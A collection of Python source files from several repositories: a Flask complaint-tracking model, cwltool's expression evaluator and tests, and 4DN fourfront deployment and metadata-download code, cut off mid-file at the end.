from flaskblog import db,login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model,UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(60), nullable=False)
complainants = db.relationship('Complaint', backref='author', lazy=True)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Complaint(db.Model):
id = db.Column(db.Integer, primary_key=True)
complainant = db.Column(db.String(100), nullable=False)
compph = db.Column(db.String, nullable=False)
victim=db.Column(db.String, nullable=False)
victph=db.Column(db.String, nullable=False)
doc=db.Column(db.String,nullable=False)
accused=db.Column(db.String,nullable=False)
description=db.Column(db.Text,nullable=False)
sections=db.Column(db.String,nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
compadd=db.Column(db.String,nullable=False)
victadd=db.Column(db.String,nullable=False)
def __repr__(self):
return f"Complaint('{self.user_id}', '{self.complainant}')"
``` |
{
"source": "4dn-dcic/cwltool",
"score": 2
} |
#### File: cwltool/cwltool/expression.py
```python
from __future__ import absolute_import
import copy
import json
import logging
import re
from typing import Any, AnyStr, Dict, List, Text, Union
from .utils import docker_windows_path_adjust
import six
from six import u
from . import sandboxjs
from .errors import WorkflowException
from .utils import bytes2str_in_dicts
_logger = logging.getLogger("cwltool")
def jshead(engineConfig, rootvars):
# type: (List[Text], Dict[Text, Any]) -> Text
# make sure all the byte strings are converted
# to str in `rootvars` dict.
# TODO: need to make sure the `rootvars dict`
# contains no bytes type in the first place.
if six.PY3:
rootvars = bytes2str_in_dicts(rootvars) # type: ignore
return u"\n".join(engineConfig + [u"var %s = %s;" % (k, json.dumps(v, indent=4)) for k, v in rootvars.items()])
# decode all raw strings to unicode
seg_symbol = r"""\w+"""
seg_single = r"""\['([^']|\\')+'\]"""
seg_double = r"""\["([^"]|\\")+"\]"""
seg_index = r"""\[[0-9]+\]"""
segments = r"(\.%s|%s|%s|%s)" % (seg_symbol, seg_single, seg_double, seg_index)
segment_re = re.compile(u(segments), flags=re.UNICODE)
param_str = r"\((%s)%s*\)$" % (seg_symbol, segments)
param_re = re.compile(u(param_str), flags=re.UNICODE)
JSON = Union[Dict[Any, Any], List[Any], Text, int, float, bool, None]
class SubstitutionError(Exception):
pass
def scanner(scan): # type: (Text) -> List[int]
DEFAULT = 0
DOLLAR = 1
PAREN = 2
BRACE = 3
SINGLE_QUOTE = 4
DOUBLE_QUOTE = 5
BACKSLASH = 6
i = 0
stack = [DEFAULT]
start = 0
while i < len(scan):
state = stack[-1]
c = scan[i]
if state == DEFAULT:
if c == '$':
stack.append(DOLLAR)
elif c == '\\':
stack.append(BACKSLASH)
elif state == BACKSLASH:
stack.pop()
if stack[-1] == DEFAULT:
return [i - 1, i + 1]
elif state == DOLLAR:
if c == '(':
start = i - 1
stack.append(PAREN)
elif c == '{':
start = i - 1
stack.append(BRACE)
else:
stack.pop()
elif state == PAREN:
if c == '(':
stack.append(PAREN)
elif c == ')':
stack.pop()
if stack[-1] == DOLLAR:
return [start, i + 1]
elif c == "'":
stack.append(SINGLE_QUOTE)
elif c == '"':
stack.append(DOUBLE_QUOTE)
elif state == BRACE:
if c == '{':
stack.append(BRACE)
elif c == '}':
stack.pop()
if stack[-1] == DOLLAR:
return [start, i + 1]
elif c == "'":
stack.append(SINGLE_QUOTE)
elif c == '"':
stack.append(DOUBLE_QUOTE)
elif state == SINGLE_QUOTE:
if c == "'":
stack.pop()
elif c == '\\':
stack.append(BACKSLASH)
elif state == DOUBLE_QUOTE:
if c == '"':
stack.pop()
elif c == '\\':
stack.append(BACKSLASH)
i += 1
if len(stack) > 1:
raise SubstitutionError(
"Substitution error, unfinished block starting at position {}: {}".format(start, scan[start:]))
else:
return None
def next_seg(remain, obj): # type: (Text, Any) -> Any
if remain:
m = segment_re.match(remain)
key = None # type: Union[Text, int]
if m.group(0)[0] == '.':
key = m.group(0)[1:]
elif m.group(0)[1] in ("'", '"'):
key = m.group(0)[2:-2].replace("\\'", "'").replace('\\"', '"')
if key:
if isinstance(obj, list) and key == "length" and not remain[m.end(0):]:
return len(obj)
if not isinstance(obj, dict):
raise WorkflowException(" is a %s, cannot index on string '%s'" % (type(obj).__name__, key))
if key not in obj:
raise WorkflowException(" does not contain key '%s'" % key)
else:
try:
key = int(m.group(0)[1:-1])
except ValueError as v:
raise WorkflowException(u(str(v)))
if not isinstance(obj, list):
raise WorkflowException(" is a %s, cannot index on int '%s'" % (type(obj).__name__, key))
if key >= len(obj):
raise WorkflowException(" list index %i out of range" % key)
try:
return next_seg(remain[m.end(0):], obj[key])
except WorkflowException as w:
raise WorkflowException("%s%s" % (m.group(0), w))
else:
return obj
def evaluator(ex, jslib, obj, fullJS=False, timeout=None, force_docker_pull=False, debug=False, js_console=False):
# type: (Text, Text, Dict[Text, Any], bool, int, bool, bool, bool) -> JSON
m = param_re.match(ex)
if m:
if m.end(1)+1 == len(ex) and m.group(1) == "null":
return None
try:
return next_seg(m.group(0)[m.end(1) - m.start(0):-1], obj[m.group(1)])
except Exception as w:
raise WorkflowException("%s%s" % (m.group(1), w))
elif fullJS:
return sandboxjs.execjs(ex, jslib, timeout=timeout, force_docker_pull=force_docker_pull, debug=debug, js_console=js_console)
else:
raise sandboxjs.JavascriptException(
"Syntax error in parameter reference '%s' or used Javascript code without specifying InlineJavascriptRequirement.",
ex)
def interpolate(scan, rootvars,
timeout=None, fullJS=None, jslib="", force_docker_pull=False,
debug=False, js_console=False):
# type: (Text, Dict[Text, Any], int, bool, Union[str, Text], bool, bool, bool) -> JSON
scan = scan.strip()
parts = []
w = scanner(scan)
while w:
parts.append(scan[0:w[0]])
if scan[w[0]] == '$':
e = evaluator(scan[w[0] + 1:w[1]], jslib, rootvars, fullJS=fullJS,
timeout=timeout, force_docker_pull=force_docker_pull,
debug=debug, js_console=js_console)
if w[0] == 0 and w[1] == len(scan):
return e
leaf = json.dumps(e, sort_keys=True)
if leaf[0] == '"':
leaf = leaf[1:-1]
parts.append(leaf)
elif scan[w[0]] == '\\':
e = scan[w[1] - 1]
parts.append(e)
scan = scan[w[1]:]
w = scanner(scan)
parts.append(scan)
return ''.join(parts)
def do_eval(ex, jobinput, requirements, outdir, tmpdir, resources,
context=None, pull_image=True, timeout=None, force_docker_pull=False, debug=False, js_console=False):
# type: (Union[dict, AnyStr], Dict[Text, Union[Dict, List, Text]], List[Dict[Text, Any]], Text, Text, Dict[Text, Union[int, Text]], Any, bool, int, bool, bool, bool) -> Any
runtime = copy.copy(resources)
runtime["tmpdir"] = docker_windows_path_adjust(tmpdir)
runtime["outdir"] = docker_windows_path_adjust(outdir)
rootvars = {
u"inputs": jobinput,
u"self": context,
u"runtime": runtime}
if isinstance(ex, (str, Text)):
fullJS = False
jslib = u""
for r in reversed(requirements):
if r["class"] == "InlineJavascriptRequirement":
fullJS = True
jslib = jshead(r.get("expressionLib", []), rootvars)
break
try:
return interpolate(ex,
rootvars,
timeout=timeout,
fullJS=fullJS,
jslib=jslib,
force_docker_pull=force_docker_pull,
debug=debug,
js_console=js_console)
except Exception as e:
raise WorkflowException("Expression evaluation error:\n%s" % e)
else:
return ex
```
#### File: cwltool/tests/test_check.py
```python
from __future__ import absolute_import
import unittest
import cwltool.expression as expr
import cwltool.factory
import cwltool.pathmapper
import cwltool.process
import cwltool.workflow
import pytest
from cwltool.main import main
from cwltool.utils import onWindows
from .util import get_data
class TestCheck(unittest.TestCase):
@pytest.mark.skipif(onWindows(),
reason="Instance of Cwltool is used, On windows that invoke a default docker Container")
def test_output_checking(self):
self.assertEquals(main([get_data('tests/wf/badout1.cwl')]), 1)
self.assertEquals(main([get_data('tests/wf/badout2.cwl')]), 1)
self.assertEquals(main([get_data('tests/wf/badout3.cwl')]), 1)
```
#### File: cwltool/tests/test_pack.py
```python
from __future__ import absolute_import
import json
import os
import unittest
from functools import partial
import cwltool.pack
from cwltool.main import print_pack as print_pack
import cwltool.workflow
from cwltool.load_tool import fetch_document, validate_document
from cwltool.main import makeRelative
from cwltool.pathmapper import adjustDirObjs, adjustFileObjs
from .util import get_data
class TestPack(unittest.TestCase):
def test_pack(self):
self.maxDiff = None
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/revsort.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
packed = cwltool.pack.pack(document_loader, processobj, uri, metadata)
with open(get_data("tests/wf/expect_packed.cwl")) as f:
expect_packed = json.load(f)
adjustFileObjs(packed, partial(makeRelative,
os.path.abspath(get_data("tests/wf"))))
adjustDirObjs(packed, partial(makeRelative,
os.path.abspath(get_data("tests/wf"))))
self.assertIn("$schemas", packed)
del packed["$schemas"]
del expect_packed["$schemas"]
self.assertEqual(expect_packed, packed)
def test_pack_missing_cwlVersion(self):
"""Test to ensure the generated pack output is not missing
the `cwlVersion` in case of single tool workflow and single step workflow"""
# Since diff is longer than 3174 characters
self.maxDiff = None
# Testing single tool workflow
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/hello_single_tool.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
# generate pack output dict
packed = json.loads(print_pack(document_loader, processobj, uri, metadata))
self.assertEqual('v1.0', packed["cwlVersion"])
# Testing single step workflow
document_loader, workflowobj, uri = fetch_document(
get_data("tests/wf/hello-workflow.cwl"))
document_loader, avsc_names, processobj, metadata, uri = validate_document(
document_loader, workflowobj, uri)
# generate pack output dict
packed = json.loads(print_pack(document_loader, processobj, uri, metadata))
self.assertEqual('v1.0', packed["cwlVersion"])
``` |
{
"source": "4dn-dcic/fourfron",
"score": 2
} |
#### File: fourfron/deploy/deploy_beanstalk.py
```python
import os
from time import sleep
import sys
import subprocess
import hashlib
import argparse
from datetime import datetime
def tag(name):
subprocess.check_output(['git', 'tag', name, '-m', 'version created for staging deploy'])
subprocess.check_output(['git', 'push', 'origin-travis', name])
def merge(source, merge_to):
res1 = subprocess.check_output(['git', 'status']).decode('utf-8').strip()
print("status on master is: " + res1)
subprocess.check_output(['git', 'stash'])
subprocess.check_output(
['git', 'checkout', merge_to])
res = subprocess.check_output(['git', 'status']).decode('utf-8').strip()
print("status on prod is: " + res)
res2 = subprocess.check_output(
['git', 'merge', source, '-m', 'merged']).decode('utf-8').strip()
print(res2)
subprocess.check_output(
['git', 'push', 'origin-travis', merge_to]).decode('utf-8').strip()
subprocess.check_output(['git', 'stash', 'pop'])
def get_git_version():
version = os.environ.get("TRAVIS_COMMIT", "")[:7]
if not version:
version = subprocess.check_output(
['git', '-C', os.path.dirname(__file__), 'describe']).decode('utf-8').strip()
version = version[:7]
diff = subprocess.check_output(
['git', '-C', os.path.dirname(__file__), 'diff', '--no-ext-diff'])
if diff:
version += '-patch' + hashlib.sha1(diff).hexdigest()[:7]
return "v-" + version
def update_version(version, branch):
filename = 'buildout.cfg'
regex = 's/encoded_version.*/encoded_version = %s/' % (version)
print("updated buildout.cfg with version", version)
subprocess.check_output(
['sed', '-i', regex, filename])
commit_with_previous_msg(filename, branch)
def commit_with_previous_msg(filename, branch):
print("adding file to git")
subprocess.check_output(
['git', 'add', filename])
msg = parse(previous_git_commit())
print("git commit -m " + msg)
subprocess.check_output(
['git', 'commit', '-m', 'version bump + ' + msg])
subprocess.check_output(
['git', 'push', 'origin-travis', branch])
def previous_git_commit():
return subprocess.check_output(
['git', 'log', '-1']
).decode('utf-8').strip()
def parse(commit):
author, msg = "", ""
# parse up some commit lines
commit_lines = commit.split('\n')
author = commit_lines[1].split(":")[1].strip()
msg = " ".join(l.strip() for l in commit_lines[3:] if l)
return "%s - %s" % (author, msg)
def deploy(deploy_to=None):
'''
run eb deploy and show the output
'''
print("start deployment to elastic beanstalk deploy to is %s" % str(deploy_to))
wait = [20, 40, 60, 120, 120, 120, 120]
for time in wait:
try:
if not deploy_to:
p = subprocess.Popen(['eb', 'deploy'], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
else:
p = subprocess.Popen(['eb', 'deploy', deploy_to], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
except Exception:
# we often get errors due to timeouts
sleep(time)
else:
break
time_started = datetime.now()
print('Started deployment at {}. Waiting 2 minutes & exiting.'.format(time_started.strftime('%H:%M:%S:%f')))
sleep(120)
# MAYBE TODO: Setup new thread and listen re: "Deploying new version to instance(s).". Exit if this occurs before 2min.
#
#while True:
# out = p.stdout.readline()
# out = out.decode('utf-8')
# curr_time = datetime.now()
# if out != '':
# sys.stdout.write('[' + curr_time.strftime('%H:%M:%S:%f') + '] ' + out)
# sys.stdout.flush()
# if ("Deploying new version to instance(s)." in out) or (time_started + timedelta(minutes=2) <= curr_time): # 2 min time limit
# print('Killing sub-process & exiting.')
# sleep(5)
# p.kill()
# break
# if out == '' and p.poll() is not None:
# print('Deploy sub-process complete. Exiting.')
# break
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="update version if relevant and deploy"
)
args = parser.parse_args()
branch = os.environ.get("TRAVIS_BRANCH")
merge_to = os.environ.get("tibanna_merge", "").strip()
deploy_to = os.environ.get("tibanna_deploy", "").strip()
try:
if deploy_to in ['fourfront-staging', 'fourfront-webprod', 'fourfront-webprod2']:
print("deploy to staging")
ver = get_git_version()
# checkout correct branch
print("checkout master")
subprocess.check_output(
['git', 'checkout', branch])
print("update version")
update_version(ver, branch)
if merge_to:
print("merge from %s to %s" % (branch, merge_to))
merge(branch, merge_to)
print("tag it")
tag(ver)
except Exception as e:
# this can all go wrong if somebody pushes during the build
# or what not, in which case we just won't update the tag / merge
print("got the following expection but we will ignore it")
print(e)
print("switching back to source branch")
subprocess.check_output(
['git', 'checkout', branch])
print("now let's deploy")
deploy(deploy_to)
```
#### File: fourfron/deploy/generate_production_ini.py
```python
import os
from dcicutils.deployment_utils import BasicLegacyFourfrontIniFileManager
class FourfrontDeployer(BasicLegacyFourfrontIniFileManager):
_MY_DIR = os.path.dirname(__file__)
TEMPLATE_DIR = os.path.join(_MY_DIR, "ini_files")
PYPROJECT_FILE_NAME = os.path.join(os.path.dirname(_MY_DIR), "pyproject.toml")
def main():
FourfrontDeployer.main()
if __name__ == '__main__':
main()
```
#### File: src/encoded/batch_download.py
```python
from collections import OrderedDict
from pyramid.compat import bytes_
from pyramid.httpexceptions import (
HTTPBadRequest,
HTTPMovedPermanently
)
from base64 import b64decode
from pyramid.view import view_config
from pyramid.response import Response
from snovault import TYPES
from snovault.util import simple_path_ids, debug_log
from itertools import chain
from urllib.parse import (
parse_qs,
urlencode,
)
from .search import (
iter_search_results,
build_table_columns,
get_iterable_search_results,
make_search_subreq
)
import csv
import io
import json
from datetime import datetime
import structlog
log = structlog.getLogger(__name__)
def includeme(config):
config.add_route('batch_download', '/batch_download/{search_params}')
config.add_route('metadata', '/metadata/')
config.add_route('metadata_redirect', '/metadata/{search_params}/{tsv}')
config.add_route('peak_metadata', '/peak_metadata/{search_params}/{tsv}')
config.add_route('report_download', '/report.tsv')
config.scan(__name__)
EXP_SET = 0
EXP = 1
FILE = 2
FILE_ONLY = 3
# includes concatenated properties
# tuple structure is (key/title - (field type, [field name], remove duplicates)
TSV_MAPPING = OrderedDict([
('File Download URL', (FILE, ['href'], True)),
('Experiment Set Accession', (EXP_SET, ['accession'], True)),
('Experiment Accession', (EXP, ['accession'], True)),
('Experiment Set Accession ', (FILE_ONLY, ['experiment_sets.accession'], True)), #do not remove trailing whitespace of the key
('Experiment Accession ', (FILE_ONLY, ['experiments.accession'], True)), #do not remove trailing whitespace of the key
('File Accession', (FILE, ['accession'], True)),
('Size (MB)', (FILE, ['file_size'], True)),
('md5sum', (FILE, ['md5sum'], True)),
('File Type', (FILE, ['file_type'], True)),
('File Format', (FILE, ['file_format.display_title'], True)),
('Bio Rep No', (EXP_SET, ['replicate_exps.bio_rep_no'], True)),
('Tech Rep No', (EXP_SET, ['replicate_exps.tec_rep_no'], True)),
('Biosource Type', (EXP, ['biosample.biosource.biosource_type'], True)),
('Organism', (EXP, ['biosample.biosource.individual.organism.name'], True)),
('Related File Relationship', (FILE, ['related_files.relationship_type'], False)),
('Related File', (FILE, ['related_files.file.accession'], False)),
('Paired End', (FILE, ['paired_end'], True)),
('Set Status', (EXP_SET, ['status'], True)),
('File Status', (FILE, ['status'], True)),
('Publication', (EXP_SET, ['produced_in_pub.short_attribution'], True)),
('Experiment Type', (FILE, ['track_and_facet_info.experiment_type'], True)),
('Replicate Info', (FILE, ['track_and_facet_info.replicate_info'], True)),
('Assay Details', (FILE, ['track_and_facet_info.assay_info'], True)),
('Biosource', (FILE, ['track_and_facet_info.biosource_name'], True)),
('Dataset', (FILE, ['track_and_facet_info.dataset'], True)),
('Condition', (FILE, ['track_and_facet_info.condition'], True)),
('In Experiment As', (FILE, ['track_and_facet_info.experiment_bucket'], True)),
('Project', (EXP_SET, ['award.project'], True)),
('Generating Lab', (FILE, ['track_and_facet_info.lab_name'], True)),
('Experimental Lab', (FILE, ['track_and_facet_info.experimental_lab'], True)),
('Contributing Lab', (FILE, ['contributing_labs.display_title'], True)),
('Notes', (FILE, ['notes_to_tsv'], True)),
('Open Data URL', (FILE, ['open_data_url'], True)),
#('UUID', (FILE, ['uuid'])),
#('Biosample life stage', ['replicates.library.biosample.life_stage']),
#('Biosample sex', ['replicates.library.biosample.sex']),
#('Biosample organism', ['replicates.library.biosample.organism.scientific_name']),
#('Biosample treatments', ['replicates.library.biosample.treatments.treatment_term_name']),
#('Biosample subcellular fraction term name', ['replicates.library.biosample.subcellular_fraction_term_name']),
#('Biosample phase', ['replicates.library.biosample.phase']),
#('Biosample synchronization stage', ['replicates.library.biosample.fly_synchronization_stage',
# 'replicates.library.biosample.worm_synchronization_stage',
# 'replicates.library.biosample.post_synchronization_time',
# 'replicates.library.biosample.post_synchronization_time_units']),
#('Experiment target', ['target.name']),
#('Antibody accession', ['replicates.antibody.accession']),
#('Library made from', ['replicates.library.nucleic_acid_term_name']),
#('Library depleted in', ['replicates.library.depleted_in_term_name']),
#('Library extraction method', ['replicates.library.extraction_method']),
#('Library lysis method', ['replicates.library.lysis_method']),
#('Library crosslinking method', ['replicates.library.crosslinking_method']),
#('Date Created', ['experiments_in_set.files.date_created']),
#('Project', ['award.project']),
#('RBNS protein concentration', ['files.replicate.rbns_protein_concentration', 'files.replicate.rbns_protein_concentration_units']),
#('Library fragmentation method', ['files.replicate.library.fragmentation_method']),
#('Library size range', ['files.replicate.library.size_range']),
#('Biosample Age', ['files.replicate.library.biosample.age_display']),
#('Biological replicate(s)', ['files.biological_replicates']),
#('Technical replicate', ['files.replicate.technical_replicate_number']),
#('Read length', ['files.read_length']),
#('Run type', ['files.run_type']),
#('Paired with', ['experiments_in_set.files.paired_with']),
#('Derived from', ['files.derived_from.accession']),
#('Assembly', ['files.assembly']),
#('Platform', ['files.platform.title'])
])
EXTRA_FIELDS = {
EXP_SET : ['replicate_exps.replicate_exp.accession', 'lab.correspondence.contact_email'],
EXP : ['reference_files.accession', 'reference_files.href', 'reference_files.file_format.display_title', 'reference_files.file_type', 'reference_files.md5sum', 'reference_files.file_size', 'reference_files.status', 'reference_files.lab.display_title', 'reference_files.contributing_labs.display_title'],
FILE : ['extra_files.href', 'extra_files.file_format', 'extra_files.md5sum', 'extra_files.use_for', 'extra_files.file_size', 'file_classification']
}
def get_file_uuids(result_dict):
file_uuids = []
for item in result_dict['@graph']:
for file in item['files']:
file_uuids.append(file['uuid'])
return list(set(file_uuids))
def get_biosample_accessions(file_json, experiment_json):
for f in experiment_json['files']:
if file_json['uuid'] == f['uuid']:
accession = f.get('replicate', {}).get('library', {}).get('biosample', {}).get('accession')
if accession:
return accession
accessions = []
for replicate in experiment_json.get('replicates', []):
accession = replicate['library']['biosample']['accession']
accessions.append(accession)
return ', '.join(list(set(accessions)))
def get_peak_metadata_links(request):
if request.matchdict.get('search_params'):
search_params = request.matchdict['search_params']
else:
search_params = request.query_string
peak_metadata_tsv_link = '{host_url}/peak_metadata/{search_params}/peak_metadata.tsv'.format(
host_url=request.host_url,
search_params=search_params
)
peak_metadata_json_link = '{host_url}/peak_metadata/{search_params}/peak_metadata.json'.format(
host_url=request.host_url,
search_params=search_params
)
return [peak_metadata_tsv_link, peak_metadata_json_link]
class DummyFileInterfaceImplementation(object):
def __init__(self):
self._line = None
def write(self, line):
self._line = line
def read(self):
return self._line
@view_config(route_name='peak_metadata', request_method='GET')
@debug_log
def peak_metadata(context, request):
param_list = parse_qs(request.matchdict['search_params'])
param_list['field'] = []
header = ['assay_term_name', 'coordinates', 'target.label', 'biosample.accession', 'file.accession', 'experiment.accession']
param_list['limit'] = ['all']
path = '/region-search/?{}&{}'.format(urlencode(param_list, True),'referrer=peak_metadata')
results = request.embed(path, as_user=True)
uuids_in_results = get_file_uuids(results)
rows = []
json_doc = {}
for row in results['peaks']:
if row['_id'] in uuids_in_results:
file_json = request.embed(row['_id'])
experiment_json = request.embed(file_json['dataset'])
for hit in row['inner_hits']['positions']['hits']['hits']:
data_row = []
coordinates = '{}:{}-{}'.format(hit['_index'], hit['_source']['start'], hit['_source']['end'])
file_accession = file_json['accession']
experiment_accession = experiment_json['accession']
assay_name = experiment_json['assay_term_name']
target_name = experiment_json.get('target', {}).get('label') # not all experiments have targets
biosample_accession = get_biosample_accessions(file_json, experiment_json)
data_row.extend([assay_name, coordinates, target_name, biosample_accession, file_accession, experiment_accession])
rows.append(data_row)
if assay_name not in json_doc:
json_doc[assay_name] = []
else:
json_doc[assay_name].append({
'coordinates': coordinates,
'target.name': target_name,
'biosample.accession': list(biosample_accession.split(', ')),
'file.accession': file_accession,
'experiment.accession': experiment_accession
})
if 'peak_metadata.json' in request.url:
return Response(
content_type='text/plain',
body=json.dumps(json_doc),
content_disposition='attachment;filename="%s"' % 'peak_metadata.json'
)
fout = io.StringIO()
writer = csv.writer(fout, delimiter='\t')
writer.writerow(header)
writer.writerows(rows)
return Response(
content_type='text/tsv',
body=fout.getvalue(),
content_disposition='attachment;filename="%s"' % 'peak_metadata.tsv'
)
# Local flag. TODO: Just perform some request to this endpoint after bin/pserve as part of deploy script.
endpoints_initialized = {
"metadata" : False
}
@view_config(route_name='metadata', request_method=['GET', 'POST'])
@debug_log
def metadata_tsv(context, request):
'''
Accepts a POST Form request (NOT JSON) with 'accession_triples' (list of 3-item arrays containing ExpSet Accession, Exp Accession, File Accession)
Run search sub-request and serves any in-accession_triples File from search result as a file row in streamed metadata.tsv file.
Alternatively, can accept a GET request wherein all files from ExpSets matching search query params are included.
'''
search_params = dict(request.GET) # Must use request.GET to get URI query params only (exclude POST params, etc.)
# If conditions are met (equal number of accession per Item type), will be a list with tuples: (ExpSetAccession, ExpAccession, FileAccession)
accession_triples = None
filename_to_suggest = None
post_body = { "accession_triples" : None, "download_file_name" : None }
if request.POST.get('accession_triples') is not None: # Was submitted as a POST form JSON variable. Workaround to not being able to download files through AJAX.
try:
post_body['accession_triples'] = json.loads(request.POST.get('accession_triples'))
post_body['download_file_name'] = json.loads(request.POST.get('download_file_name')) # Note: Even though text string is requested, POST req should wrap it in JSON.stringify() else this fails.
except Exception:
pass
if isinstance(post_body['accession_triples'], list) and len(post_body['accession_triples']) > 0:
if isinstance(post_body['accession_triples'][0], list): # List of arrays
accession_triples = [ (acc_list[0], acc_list[1], acc_list[2] ) for acc_list in post_body['accession_triples'] ]
else: # List of dicts { 'accession', 'experiments_in_set.accession', ... } --- DEPRECATED
accession_triples = [ (acc_dict.get('accession', 'NONE'), acc_dict.get('experiments_in_set.accession', 'NONE'), acc_dict.get('experiments_in_set.files.accession', 'NONE') ) for acc_dict in post_body['accession_triples'] ]
filename_to_suggest = post_body.get('download_file_name', None)
if 'referrer' in search_params:
search_path = '/{}/'.format(search_params.pop('referrer')[0])
else:
search_path = '/search/'
search_params['field'] = []
search_params['sort'] = ['accession']
search_params['type'] = search_params.get('type', 'ExperimentSetReplicate')
header = []
def add_field_to_search_params(itemType, field):
if search_params['type'][0:13] == 'ExperimentSet':
if itemType == EXP_SET:
search_params['field'].append(param_field)
elif itemType == EXP:
search_params['field'].append('experiments_in_set.' + param_field)
elif itemType == FILE:
search_params['field'].append('experiments_in_set.files.' + param_field)
search_params['field'].append('experiments_in_set.processed_files.' + param_field)
search_params['field'].append('experiments_in_set.other_processed_files.files.' + param_field)
search_params['field'].append('processed_files.' + param_field)
search_params['field'].append('other_processed_files.files.' + param_field)
elif search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
if itemType == EXP_SET:
search_params['field'].append('experiment_set.' + param_field)
elif itemType == EXP:
search_params['field'].append('experiment.' + param_field)
elif itemType == FILE or itemType == FILE_ONLY:
search_params['field'].append(param_field)
else:
raise HTTPBadRequest("Metadata can only be retrieved currently for Experiment Sets or Files. Received \"" + search_params['type'] + "\"")
for prop in TSV_MAPPING:
if search_params['type'][0:4] == 'File' and search_params['type'][4:7] != 'Set':
if TSV_MAPPING[prop][0] == FILE or TSV_MAPPING[prop][0] == FILE_ONLY:
header.append(prop)
elif TSV_MAPPING[prop][0] != FILE_ONLY:
header.append(prop)
for param_field in TSV_MAPPING[prop][1]:
add_field_to_search_params(TSV_MAPPING[prop][0], param_field)
for itemType in EXTRA_FIELDS:
for param_field in EXTRA_FIELDS[itemType]:
add_field_to_search_params(itemType, param_field)
# Ensure we send accessions to ES to help narrow initial result down.
# If too many accessions to include in /search/ URL (exceeds 2048 characters, aka accessions for roughly 20 files), we'll fetch search query as-is and then filter/narrow down.
#if accession_triples and len(accession_triples) < 20:
# search_params['accession'] = [ triple[0] for triple in accession_triples ]
# search_params['experiments_in_set.accession'] = [ triple[1] for triple in accession_triples ]
# search_params['experiments_in_set.files.accession'] = [ triple[2] for triple in accession_triples ]
file_cache = {} # Exclude URLs of prev-encountered file(s).
summary = {
'counts' : {
'Files Selected for Download' : len(accession_triples) if accession_triples else None,
'Total Files' : 0,
'Total Unique Files to Download' : 0
},
'lists' : {
'Not Available' : [],
'Duplicate Files' : [],
'Extra Files' : [],
'Reference Files' : []
}
}
exp_raw_file_cache = {} # experiments that have processed files selected for download (it is used to decide whether to include ref files or not)
if filename_to_suggest is None:
filename_to_suggest = 'metadata_' + datetime.utcnow().strftime('%Y-%m-%d-%Hh-%Mm') + '.tsv'
def get_values_for_field(item, field, remove_duplicates=True):
c_value = []
if remove_duplicates:
for value in simple_path_ids(item, field):
if str(value) not in c_value:
c_value.append(str(value))
return list(set(c_value))
else:
for value in simple_path_ids(item, field):
c_value.append(str(value))
return c_value
def get_value_for_column(item, col):
temp = []
for c in TSV_MAPPING[col][1]:
c_value = get_values_for_field(item, c, TSV_MAPPING[col][2])
if len(temp):
if len(c_value):
temp = [x + ' ' + c_value[0] for x in temp]
else:
temp = c_value
if TSV_MAPPING[col][2]:
return ', '.join(list(set(temp)))
else:
return ', '.join(temp)
def get_correct_rep_no(column_name, column_vals_dict, experiment_set):
'''Find which Replicate Exp our File Row Object belongs to, and return its replicate number.'''
if column_vals_dict is None or column_name is None:
return None
def get_val(find_exp_accession):
for repl_exp in experiment_set.get('replicate_exps',[]):
repl_exp_accession = repl_exp.get('replicate_exp', {}).get('accession', None)
if repl_exp_accession is not None and repl_exp_accession == find_exp_accession:
rep_key = 'bio_rep_no' if column_name == 'Bio Rep No' else 'tec_rep_no'
return str(repl_exp.get(rep_key))
return None
experiment_accession = column_vals_dict.get('Experiment Accession')
if experiment_accession:
if ',' not in experiment_accession:
return get_val(experiment_accession)
else:
vals = [ get_val(accession) for accession in experiment_accession.split(', ') if accession is not None and accession != 'NONE' ]
return ', '.join(filter(None, vals))
return None
def should_file_row_object_be_included(column_vals_dict):
'''Ensure row's ExpSet, Exp, and File accession are in list of accession triples sent in URL params.'''
if accession_triples is None:
return True
for set_accession, exp_accession, file_accession in accession_triples:
if (
(('Experiment Set Accession' in column_vals_dict and set_accession == column_vals_dict['Experiment Set Accession']) or set_accession == 'NONE') and
(('Experiment Accession' in column_vals_dict and exp_accession == column_vals_dict['Experiment Accession']) or exp_accession == 'NONE') and
(file_accession == column_vals_dict['File Accession'] or column_vals_dict['Related File Relationship'] == 'reference file for' or file_accession == 'NONE')
):
# if the file is a raw file (actually if classification is not processed file, then we assume it as a raw file),
# then add the related exp to the exp_raw_file_cache dict. to check
# whether to include exp's ref files since we will include ref files if at least one raw file
# is selected for download.
if exp_accession and len(column_vals_dict['File Classification']) > 0 and column_vals_dict['File Classification'] != 'processed file':
exp_raw_file_cache[exp_accession] = True
# include ref files if at least one raw file of the parent experiment is already selected for downloads, else discard it
if exp_accession and column_vals_dict['Related File Relationship'] == 'reference file for':
if exp_accession not in exp_raw_file_cache:
return False
return True
return False
def flatten_other_processed_files(other_processed_files):
flat_list = []
for opf in other_processed_files:
for f in opf.get('files', []):
flat_list.append(f)
return flat_list
def format_experiment_set(exp_set):
'''
:param exp_set: A dictionary representation of ExperimentSet as received from /search/ results.
:returns Iterable of dictionaries which represent File item rows, with column headers as keys.
'''
exp_set_row_vals = {}
exp_set_cols = [ col for col in header if TSV_MAPPING[col][0] == EXP_SET ]
for column in exp_set_cols:
exp_set_row_vals[column] = get_value_for_column(exp_set, column)
def sort_files_from_expset_by_replicate_numbers(file_dict):
try:
bio_rep_no = int(file_dict['Bio Rep No'])
except Exception:
bio_rep_no = 999
try:
tec_rep_no = int(file_dict['Tech Rep No'])
except Exception:
tec_rep_no = 999
return bio_rep_no * 100000 + tec_rep_no
# Flatten map's child result maps up to self.
return sorted(chain(
chain.from_iterable(
map(
